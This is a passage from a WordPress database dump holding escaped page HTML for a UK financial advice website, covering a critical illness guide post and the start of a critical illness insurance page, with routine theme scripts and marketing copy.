href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"/leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/best-annuity-rates\">&#13;\n										<img width=\"52\" height=\"43\" src=\"/wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/best-annuity-rates\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">&#13;\n										<img width=\"52\" height=\"21\" src=\"/wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/5-facts-know-annuities\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/staging-date-social-advisors\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-690.js\"/></div>&#13;\n		</div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download Your FREE Retirement Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','&#13;	Critical Illness Guide','','publish','closed','closed','','critical-illness-guide','','','2017-09-21 17:35:31','2017-09-21 17:35:31','',0,'http://www.equalitywalk.org.uk/critical-illness-guide',0,'post','',0),(60,1,'2017-09-21 16:34:28','2017-09-21 16:34:28','<body class=\"page page-id-2591 page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-2591 current_page_item menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Critical Illness Insurance										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Critical Illness Insurance</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-2591\" class=\"post-2591 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Critical Illness Insurance</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">April 15th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/sallyannhunt/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<h1 style=\"text-align: left;\"><span style=\"color: #6c6c6c; font-family: tahoma,geneva,sans-serif; font-size: large;\">When It Comes to Selecting Your Best Plan – Knowledge Is Power!</span></h1>&#13;\n<p style=\"text-align: left;\"><span style=\"color: #6c6c6c; font-size: medium;\"><span style=\"font-family: tahoma,geneva,sans-serif;\">Introducing the UK’s 1st solution designed for anyone who wants to avoid the common pitfalls when buying critical illness insurance. Our research report make life <em>so</em> much better for you.</span></span></p>&#13;\n<p><span style=\"color: #6c6c6c; font-family: tahoma, geneva, sans-serif;\">You’ll know exactly what illnesses you are and aren’t covered for.</span></p>&#13;\n<p/>&#13;\n<p><span style=\"color: #6c6c6c; font-family: tahoma, geneva, sans-serif;\">You’ll know the preferential wording that has a higher statistical likelihood of paying out to you.</span></p>&#13;\n<p><span style=\"font-family: tahoma,geneva,sans-serif;\">You’ll get complete peace of mind that you have chosen the best plan for your needs and your budget</span><span style=\"color: #6c6c6c;\">.</span></p>&#13;\n<p><span style=\"color: #6c6c6c; font-family: tahoma,geneva,sans-serif; font-size: medium;\">Welcome to the future of insurance.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<iframe src=\"http://app.sliderocket.com/app/fullplayer.aspx?id=abaeef30-9279-4762-ad9b-b36dd830ce5b\" width=\"400\" height=\"321\" scrolling=\"no\" frameborder=\"1\" style=\"border:1px solid #333333;border-bottom-style:none\"/>&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n			&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span3\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_single_image wpb_content_element\">&#13;\n	